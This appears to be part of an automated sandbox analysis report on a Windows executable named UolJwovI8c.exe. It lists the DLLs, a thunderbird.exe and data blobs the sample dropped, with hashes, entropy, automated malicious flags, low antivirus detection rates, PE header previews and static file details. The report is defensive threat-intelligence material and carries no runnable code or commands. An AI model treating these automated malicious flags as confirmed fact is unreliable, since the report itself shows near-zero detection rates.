Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".A.m.a.t.o.l.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".n.o.". .I.d.=.".{.4.c.e.1.f.d.3.2.-.1.a.9.f.-.4.b.a.7.-.a.a.e.e.-.4.a.4.0.6.3.0.a.8.a.d.3.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.A.8.B.B.2.6.C.9.-.8.9.F.3.-.4.2.4.1.-.8.D.B.7.-.7.2.4.7.6.9.1.C.F.D.0.D.}.". .P.e.r.M.a.c.h.i.n.e.=.".y.e.s.". ./.>..... . .<.W.i.x.P.a.c.k.a.g.e.P.r.o.p.e.r.t.i.e.s. .P.a.c.k.a.g.e.=.".H.a.l.f.p.l.a.t.e.". .V.i.t.a.l.=.".y.e.s.". .D.i.s.p.l.a.y.N.a.m.e.=.".W.i.X. .T.o.o.l.s.e.t. .v.3...1.1. .N.a.t.i.v.e. .2.0.1.5. .S.D.K.". .D.o.w.n.l.o.a.d.S.i.z.e.=.".1.5.1.6.1.1.". .P.a.c.k.a.g.e.S.i.z.e.=.".1.5.1.6.1.

C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\Trombone.dll

Download File

Process:	C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	585728
Entropy (8bit):	6.709566691910362
Encrypted:	false
SSDEEP:	12288:BBC1h1qr18wDb0EUmmo5h36tgjtYQCidIH:zC1h1qrmQb0EUmmom0tT3di
MD5:	5412CF1EEE15EE07D4E23CB377004DA0
SHA1:	AC763AAD17ECDAA18C02EF0A84BC9A33B3FD467C
SHA-256:	1E9721E45B123A884960530A0D7A7D9663FD551146DDBDBEE990FE185633BA47
SHA-512:	C5B960EDF3794582FFD4E915D9AB1F399AC905684D19F9DED0E61A0AAC907CF37B5459A2B42365FDE027646141378784DF71DD90DC716F272BF1480821C58BEB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y^p`.?.3.?.3.?.3.G.3.?.3.G.3.?.3.G.3.?.3.?.3.?.3.G.3.?.3.G.3.?.3.G.3.?.3.G.3.?.3Rich.?.3........PE..L....3.N...........!.....p...................................................P......................................P?...B...-..x.......x.......................$?......................................@...............8............................text...$n.......p.................. ..`.rdata...............t..............@..@.data....P.......&...v..............@....rsrc...x...........................@..@.reloc...M.......N..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\js3250.dll

Download File

Process:	C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	458848
Entropy (8bit):	6.755005117484388
Encrypted:	false
SSDEEP:	12288:uRS9bzEY9IiJ3GLL8XoscqSgjZa1AJA+zGx:GStzEY9IiJIL84sjSkamJA+zG
MD5:	7C4A1822055BF598F35D72E0EC98F429
SHA1:	2279A6D8E207E03C4C771D8517DD36C037F81FBF
SHA-256:	34B3343A8E21AE1DD96099EB63FD06C715F221CBF5A4A34018EEC1B344A8674F
SHA-512:	0DB43EE062436B1D4172B6E8ADDA499966A5443037F9E8AA378ABCB52A86C3FA01F0F090DCAA14D0810289E39A390E9848475A2FAF04B6776CEAF7D3A8A8ACD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w...3...3...3....c..5...\`..7...\`..1...Q`..1...3...w...g\.......y..2...._..7...Rich3...........................PE..L....[?I...........!...............................`......................... ......................................p9...6...4..P...................h...........d-.. ................................................................................text............................... ..`.rdata..t...........................@..@.data....`...p...`...V..............@....rsrc...............................@..@.reloc...........0..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\noubls

Download File

Process:	C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe
File Type:	data
Category:	dropped
Size (bytes):	21484
Entropy (8bit):	5.437098621647359
Encrypted:	false
SSDEEP:	384:kZAr47zFtbfHSjzxbMJRQDWNEMC93P/noUmuU7hfSxSdebTKBoTO:uy47zFtbfH2zmJSnoFNJSxSGTKmTO
MD5:	DE2E079B3B6C1DE36B164CE9252CCD2C
SHA1:	0811083BBA474AF86A0BE738509FBD26A233F685
SHA-256:	74A3206A31AA53921C4A6234264515094829BFD12CC6FD15449F3E53129ECCE6
SHA-512:	4C93D07EB4D69CB643F261178A3BE5FFABA7EC8291EFAC73506C27491F63274FD237C0A21C39C308647822B57379B02895CF7BF4DEAA57365E78B0D370F01AF1
Malicious:	false
Preview:	.y`gvM.....y.Y..Bi..eF^......RiaWsa.k._...K......C...W.gD.f..Z.i.....l....sVB..P`.A.l.NTx......iK.\mS........MZ...[..._.Y.C..QZ.Rn.i..n.Z`._.GABhZ^....xMe^y..XCL_........Jx.BZ.bbCu..XJtK..qt.[_.VVbZ.jsh.R.I...._B`..Xw..._N....Nekr.erX....LG..jT.l.j.W.Nk.gE.Hh.mf.`....]B..\.`tf.E`fnn....Eiue.V.[Y\.._r.c...h.uO.MC^q........K.uP..Piq.aR.n..wqKbAkmREvVIq...oUBtU.....Ll..HE.Py.m.Xi..X..Vs^.X..rl...AQQQ..F....Av.Nhe..k..a.XK.m........p...s.j..qT...YatVR.suKcX..._Z.Qj.b^V..kAj.[dKh.a.N...XuM].....x.dMvR.X..]..up..U..n.uaXc......gAU...kK.K.Z]VVVU.wi...UaIfxM.Xt.Z[.bSUw_g....]r.vtFV..]R.^.t......gY`.Jq\e.Jw.....v..oQH....\.P.e.....B.\P.d.Q.k.jftj......x.n.b.Ah.[.UyMt.N].].as..u...d...a_p.Pm..XoV..Bo.....y.B....eoH.i.`Q.f.K[rHQD.F.`Ug....W...w......byg.K....Go..[o.t..e..JXj...bSO.uMR..A....x..Z...bHv..P]j.].......KI.jq..yPN..YHZ.oM..l..o..Pr.j.BO.`Jy..lN..d..g..p...O.SSu.MB[.`.Q.hd.vU...c.Pi..\RH.s..L`....]..R.]a..NP...ehD..ig\Iqd.SaZn.d.u.HmgFy.c.Q...yLI...ncsR..Gap...F.....nrY..L.vr...L...l.r.

C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\nsldap32v50.dll

Download File

Process:	C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	145032
Entropy (8bit):	6.223296464610944
Encrypted:	false
SSDEEP:	3072:aRQRTpMrhZ3qPKnWK62E181dYZFqNpkIkwn:aiRTpMd0Si2d6FOkIk
MD5:	7081AF61B5B48EE3709FFE2996B3362C
SHA1:	69EDA947CEE9426C59683D867954A3DDFA44CC53
SHA-256:	9F3EBED578B7B58C488CD601770C0CD5346D029DB8451425CC2CE8546897F107
SHA-512:	C4E3592048DC41482F4E8F57993EF5328461C476245F125D3470B64EF8A652466BD2C12AE53E2DC9AC94A9A1C77D08F01988AC1622C2C00A28C0DB35E86519CE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..ZS..ZS..ZS..!O..XS...O..[S..5L..^S..5L..XS..ZS..cS..8L..YS...p..`S..s..[S..RichZS..........................PE..L....[?I...........!.........p......A..............`.........................0.......A..................................i%......<.................... ....... .......................................................................................text.............................. ..`.rdata..9=.......@..................@..@.data...............................@....reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\nsldappr32v50.dll

Download File

Process:	C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30344
Entropy (8bit):	3.9528812148205814
Encrypted:	false
SSDEEP:	192:68TPhk5fVC15iPnyu2rqr3NBW37AI6i3wFVUrBvCzW0BEyncjWOeyowJL/te9Xxu:xTP8fVC783vW3bwQDinNYJLtI
MD5:	B8019E6A4DCF1037AB4FB3EA74FFF91D
SHA1:	BA12B694467BB3979BD3FAEAB8698AA631C1276B
SHA-256:	8377A1BABBDB38611C7BBBAF05AC5108C1C6539104B160CB1DBFCBB7638F3AE8
SHA-512:	F60E79E01C8435EF7AB60AB2D5A38142AD3F3F32139DD77BC6CE877B84B9721077CAA39B868774842639058218740644BB897BE02720E5D2CC7B0F8707FD4FFC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................................................x.......Rich............PE..L....[?I...........!..... ...0......g#.......0.....`.........................`.......................................4..@....0..d....................`.......P.......0...............................................0...............................text...*........ .................. ..`.rdata.......0.......0..............@..@.data........@.......@..............@....reloc..\|....P.......P..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\nspr4.dll

Download File

Process:	C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	161384
Entropy (8bit):	6.486424042107867
Encrypted:	false
SSDEEP:	3072:nt3Y4Gn/cq5IFL+UaxFw2TRvRE1kayxLutLwn2bHcnn4:NYfnheSUaxFPpREWxLuw+
MD5:	312DC77A5D170D38F3D88873181FCC0E
SHA1:	E667573218122C9029DF41ACE48C709ACB5CC5E4
SHA-256:	9018EB816FD4931CFD46793DF9ED4DEDB0184566E7B8AEE39DDE542B4879CB00
SHA-512:	4CA9B816B47C99ADC3D018BAC67612892B4EFAC327E55198245CE202A6BD3BE0F9E11342337AE2533B9462CC1E877568BAA319DFEE9B807AB99808D7B09A15FE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.mk..mk..mk..qg..mk..qe..mk..ra..mk..ro..mk..mj.!mk..rx..mk..N[..mk.Nkm..mk.vMo..mk.Rich.mk.................PE..L....[?I...........!..............................`.........................p......)i..............................`....*......x....@..............p`.......P.......................................................................................text............................... ..`.rdata..6j.......p..................@..@.data...\|.... ....... ..............@....rsrc........@.......0..............@..@.reloc.......P... ...@..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\nss3.dll

Download File

Process:	C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	382560
Entropy (8bit):	6.396537438640733
Encrypted:	false
SSDEEP:	6144:Z9bwkDptQVYLyvKKp7AfrVz8lzispR55+/kBLtH7m2R2Kk+XknIUkJuiC3Rl6+/b:Z9bwkDptQVYLyxp7AfrVz8NispRCcbpe
MD5:	0E845C5A84427B1AF9B577C122BC4E23
SHA1:	43AFE65E3AA16C5981B30E6D896F7ED74BE545AE
SHA-256:	F9E1F2A9A88A5D5CA748A84784D56A65D5E611785AA1D3638C07E9B36624BC73
SHA-512:	8C3A9AD7E90E09A53207A287ADF0D283AEB246F4EF4586C3B19C219FDB7614D79B7B15560F1AC5A5D34E918B6595BCB932C8FC96BD1D20FE24CEDC218BF695E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................).............................m.....U.....Rich...........PE..L....[?I...........!.....0..........;2.......@.....`................................................................p................... ...........h...........l....A...............................................@...............................text....#.......0.................. ..`.rdata.......@.......@..............@..@.data....2...@...@...@..............@....rsrc... ...........................@..@.reloc...".......0..................@..B................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\plc4.dll

Download File

Process:	C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	34416
Entropy (8bit):	4.0883403433771806
Encrypted:	false
SSDEEP:	384:MPIxljxCHKnD4PFfxAyOkdyLO6wrgPenNYJLtIT/:M0pnCxgwrgPen4LE
MD5:	9ED02E151C4F5417C10594A19EEEB034
SHA1:	139F6DAA64D1ABC84B48A00CC25049190E338AC0
SHA-256:	FA4BEBED44856339E1D65A670ECBCE8487EC95851B1CF278D40B442E5E118F71
SHA-512:	DA8EA86529BBC407C033DE56C940E6305661167021BF79F893DE232A1ED7C54A294E71FE8FC629767FE9FC0686CD2B30AFD84BF3EEE0415AAA604C8D2CCDE8D9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[...:..:..:.%...:.%..:.%..:..:..:....:.,<..:.....:.Rich.:.........PE..L....[?I...........!..... ...@......{!.......0....)`.........................p.......................................;......$:..P....P..............xp.......`..`...`0...............................................0..T............................text...>........ .................. ..`.rdata.......0.......0..............@..@.data........@.......@..............@....rsrc........P.......P..............@..@.reloc.......`.......`..............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\plds4.dll

Download File

Process:	C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30312
Entropy (8bit):	3.4254270167584915
Encrypted:	false
SSDEEP:	192:HGaz0KM7Timc4W7uW6cbpXchb+i4BDYFr0ZYyFB+iEyncjWOeyowJL/te9Xx5gOq:HL0KMTi1bigi4BDIr0iyFBNnNYJLtIq
MD5:	5D35EE582ED616947ADE1002F25682CA
SHA1:	70B8862DA9ED370C78F82218251BD40E32C5514A
SHA-256:	ED79346AF0BD7276039E011D72B7C817E2015EDDF91224E08DAF3B2A041CA5AD
SHA-512:	E3B011BD68919E4E8BB664426249F774BF1291434242F5E258D05134CA4C13C27EBDF46C5909D1F3B68731D68F936CACF18A5F9A1397E0A7C8819E2B1A19CADD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'4.XcU..cU..cU...J..aU...J..fU...J..aU..cU..lU..7v..`U...S..bU...u..gU..RichcU..................PE..L....[?I...........!.........@......;........ ....*`.........................`......................................p".......!..P....@..............p`.......P......@ ............................................... ..@............................text............................... ..`.rdata..S.... ....... ..............@..@.data........0.......0..............@....rsrc........@.......@..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\smime3.dll

Download File

Process:	C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	112224
Entropy (8bit):	5.8935265370850285
Encrypted:	false
SSDEEP:	3072:aHg/reLDq+TdOcQCRcNW+8ilKocmFwSsZGloIYKNloFrYnW:aOyl5OMcNW+hMWup
MD5:	05FF877978A22599F8675344AFF7E9AC
SHA1:	F4E083FBD2442B0D1C9FE107DC7370E5E47BFCB7
SHA-256:	B8F3022392E3BD755B4D3BAE4011303EEA6ACAF5369AE987F33F654A30AEB5C2
SHA-512:	56105DBA4DEABBC2D1F2DE5D38182C71DD197DC32AADADFCE4E8C40E1EABB2E7280BAA60A635D42E71986E962905D24BE0FF4D14E02CC328F7053AA06BBC593B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.]#...#...#...A...!...L...&...L...!...#......w.........."......+...Rich#...........PE..L....[?I...........!......................... ....+`.................................................................U......@>..x.......0...........h...............@#............................................... ..8............................text...T........................... ..`.rdata...M... ...P... ..............@..@.data... ....p.......p..............@....rsrc...0...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\softokn3.dll

Download File

Process:	C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	254060
Entropy (8bit):	6.420458010773922
Encrypted:	false
SSDEEP:	6144:pc5eOUXOjniT9KfIx54jweoqgKwmQULxoj/idhU:pc5eOHiemOomwhqc
MD5:	DA7C7F8681BC177CC5CC1A5564BD6CE5
SHA1:	CED677CB95E289F022F62BB21D68F5FDB9EDFDD0
SHA-256:	656D3FFB58F3F75F0506595D5D818CECC59AA51DE492B21665ECAA0FF8966CE0
SHA-512:	3FDA6CA7496745A260EC82A3E4AD387AE25CFF19C950C5730F416D9EB7893032C5DC608FF25EACE223BD9F2FB95FADD7F5F7BAF32A52E30AC81BD2F37C4A4547
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N.G.N.G.N.G.Q.G.N.G.R.G.N.GfR.G.N.G.Q.G.N.G.Q.G.N.G.N.G.N.G.m.G.N.G"H.G.N.G.n.G.N.GRich.N.G........PE..L....[?I...........!..............................-`................................z...............................`k.......b..x.......0............................................................................................................text............................... ..`.rdata..\|].......`..................@..@.data...h@...p...@...p..............@....rsrc...0...........................@..@.reloc........... ..................@..B................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\ssl3.dll

Download File

Process:	C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	136800
Entropy (8bit):	6.05442036081695
Encrypted:	false
SSDEEP:	1536:lTvOaQ4zixRrizHmNexem0HfvpFnkkwyaDoaZBE3E5dqz+HNHFm+7zn4:JOaQ4zi78GW0/vpFn/wAE5YzmPm+7zn
MD5:	FDF29B3A596524ADCC11C6031E682E16
SHA1:	E78CCD155ADF81975A3187C6B7B98AD4A90AF594
SHA-256:	F5B17B9122EA779DA6E1C303F7D2D16096970E840A5FE072A65371FCFC9A8D34
SHA-512:	B4C1EF7A7D2E17C35AAF9D2BAB402871520AC2645B6F3AF7593FCAFFC340DC5075B16E8179A69A0513C9E4D51C5DC968E86BCCC4DBE2FACCD1D3A2A0A1315B25
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.W%..9v..9v..9v}.*v..9v..7v..9vp.3v..9vp.=v..9v..8v..9vK..v..9v..?v..9v..=v..9vRich..9v........................PE..L....[?I...........!.....p..........jt............1`....................................................................z.......x....... ...........h...............P...................................................D............................text....e.......p.................. ..`.rdata...7.......@..................@..@.data...T...........................@....rsrc... ...........................@..@.reloc..`........ ..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe

Download File

Process:	C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8504936
Entropy (8bit):	6.712907921131404
Encrypted:	false
SSDEEP:	196608:hAvt9ppoRcGBLRrgeu1kEMgHNODPzMhp0GEZhrKCwVFE1GfYJWDew3d4QeW2jscn:hAvjppoRcGBLRrgeu1kEMgHNqPzMhyGW
MD5:	A9D830B99ABEA315C465A440C4AA1B94
SHA1:	CCA605A33BA3CEFDF179CB93743A643A86518EFF
SHA-256:	815FC1B444CF92E9A7EB8BDAEAA9FF61A4FE49F88C9C691A87AD4C2A26956BC3
SHA-512:	4FE3D34DCE5D5A829F76B610EB65E60D14263901F6783BD0E2BEC76B7C6E94817CB955EB0C5AA8590AAEB3C718F9C24911C64D463E37DC14CFC4A2A4B0C63667
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........?..wQ..wQ..wQ..k]..wQ.@k_..wQ..h[..wQ..hU..wQ..hB..wQ..wQ..wQ..hB..wQ..Ta..wQ..wP.2.Q..T`.aqQ..qW..wQ.<WU..wQ.Rich.wQ.........................PE..L....X?I..................c..N......H.c.......c...@..........................0.......................................ry.<_..tEx......@..0...........p.................c...............................................c..#...........................text....c.......c................. ..`.rdata........c.......c.............@..@.data....S....y.......y.............@....rsrc...0....@.....................@..@................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\uwibrk

Download File

Process:	C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe
File Type:	data
Category:	dropped
Size (bytes):	4641689
Entropy (8bit):	7.95439482597699
Encrypted:	false
SSDEEP:	98304:m6u+UOCN1tSz2J8VrYFGGOdaq9uRaQVLPmH+uTUCOqTIom4oIo:Q+Ng1Yzm89YvOdaqElVLuHvTU5QIomJ
MD5:	7045D874EE7EF54A76503EC5C8E65F2A
SHA1:	D6F76F241E1BEAB6A34EEB26380C38BFD5BECF52
SHA-256:	08EE9C18D725B3133AA0254DCD94D220A7ECD717641C996B06748F07AF701DBF
SHA-512:	0FE934493ED2CA2712758FE460D4BC5F111D99AD45E38FD2CF53CD7794334B2A87D0F431D944907C7B3C2ECF375B2F101303D503A492A6B065C05E5A07C090E8
Malicious:	false
Preview:	.I]..w....oj.P.T.O.tt.O.._.y]I..yus..F.[Xn..b.Q.iL...a.u..I.Q..Int.k.I..q.P..P..O...JO.bq.nU.q..`Kj.rk..N[....sG..WXqL..GBh.Rw....KQ.y..S..__jT..E.FK.OD..Rhcr.RK.lSZ.hrF..Rvcg.YLrt.VssrA\i..Q.TPh..k.`..E....Hh.....^...[.....\...nw..mC....[.JNGj..e.Wj.EJNK..Q.....tc.TjCyr..Z..jt...Y.g.uy.Qc^.hQ..c]L..lAyRmA.p...bsSv.q.RM.X.X......oN......s.M..c..FRnRQyfFX.KZ.Y..SiY..m_.V.iI\.k...w..r..r.Gx...Sl..`k..QIWdO.N.dv....YK...C..`...Xb.ieY.[...wZm.`.Tc.D..KW.W.W.]....H.......Y.WJ.aU...n.q....Eu.p..].w.fLA.M....kab..Uyyj.w..JQN...w.d.......njk.f.xwUPa..l\....Mi.O.v....^o.qh.t..I....DQJo...g...T.iaJXm.K.bIoU.S.w.MW.RUXTF.T..rB....]...fhd.jc....K.....rf.Sfvj._Z.k..\u.n]fw...uy..X.R........f..S.j.....[]Eri.yN.hx...f.RySZh..p.].O...e.i.....C..fu.....FMB...Z.u\[..R.RwsS.Or.N.^..cG...B....i.ZGBJ.o.....IWxl.D.VOC.....k.[.YFE.B..bN..k.BU......f.DDf.yUw.....ZLl.......s...t.F....P.dOM.B...h.d.iAn.cb.a.oW.J.p..AN..FO..ct..`.A......p.V...........M...n.hj..bxMu..u.e...GYIb..`..mQ...J.._K.w.C.f...VTtjDKZ..._O

C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\xpcom_compat.dll

Download File

Process:	C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73840
Entropy (8bit):	6.756538727570579
Encrypted:	false
SSDEEP:	1536:X9W1JxRrk7xYaPxOw922ESbw030w/aUeEr32n4Q:obrSYaF2X8RaUecmn
MD5:	E9B352B512E03ED5C35D6350414B68AD
SHA1:	64CCB609EE5BB52A8DD58E95D6D56F54A7E33A49
SHA-256:	0895B8029EAB334D2AA5D31A77A975198BD71EE8D641825FCFCD178A0C5BA3D3
SHA-512:	776AC14B782AD8B9DEA952EB1AE09D799EDB5D7EA5AD7C358BCBDCD7E6C2545BE78D55467E7101E0FABF01D6668F7CA4872D57C526E2AA3F2D436A65AD85C8D4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B...#...#...#...?...#..N?...#...<...#...<...#...<...#...#...#...<...#...#..N#.......#.......#...%...#..2....#..Rich.#..........................PE..L....[?I...........!.........n....................5`.........................@..........................................oE..0........ ..............x........0..P... ................................................... ............................text............................... ..`.rdata...Y.......Z..................@..@.data...l...........................@....rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\xpcom_core.dll

Download File

Process:	C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	414832
Entropy (8bit):	6.835309595385882
Encrypted:	false
SSDEEP:	12288:uOQdJEzxhYuUZzp63kZEaYswEJM2r0P3/6e5n:uOQdWEzpAcECrte5n
MD5:	CFAC67CE4389AF145FCB33D05E2E4243
SHA1:	F0F4F60717516250EDA61299615E939B1C8B0F02
SHA-256:	822C28935F9ACFFA0F894652ADC9BA344308990005B4439E36AEA4544B9B2B80
SHA-512:	6E3F45EEFDA139AA2140FE5172321A621E87866499020220135D4A6836685EF347B9DEE7FB05332B9ACC2C6A43D44F5980C5A77D0B2C8173D221B5DAD5668811
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n:..[..[..[..QG..([..G..,[..ED../[..ED..([..[...[..HD..&[..[..9Z..~x../[..~x..U[...]..+[...{.."[..Rich[..................PE..L....[?I...........!.....4...........>.......P....7`.................................D..............................P....M..h........@.......................P...:...T...............................................P..t............................text...;3.......4.................. ..`.rdata.......P.......8..............@..@.data...p'.......&..................@....rsrc........@......................@..@.reloc...?...P...@..................@..B........................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.99322302573468
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	UolJwovI8c.exe
File size:	10'750'445 bytes
MD5:	b0ad260d058a7f4f299b4bbc7f876799
SHA1:	e056c9e7fad86450e47c43120f9dd74e20c84db9
SHA256:	79120d139d1041d1c9a506a1a21ed304211f43893dd61295e64028cdb1fa34e2
SHA512:	04887bd3d1fd26b6f1e810eaddce12a459b61fc8bd52fcdead350dcb7d5d65e7f38a57ab98e88004829a6798ce364bc1d48b45965cb6488bd06adcb6a5cc4a95
SSDEEP:	196608:sfUUhRnMReYqoWJ8O1FrYKuMdQRCbRGWj0MpQXs2eQdYwWXqEEV8MEkqISNNNt0:8LhqRevZYqaWVf2ldYB6f8/1v2
TLSH:	2CB6333291614037F2F202B7E968A1307E6CE7383B51887AD3D4BD1D2EA908576FB657
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@.......@......y@.......@..."\|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@.

File Icon


Icon Hash:	2d2e3797b32b2b99

Static PE Info

General

Entrypoint:	0x42e2a6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5A10AD86 [Sat Nov 18 22:00:38 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
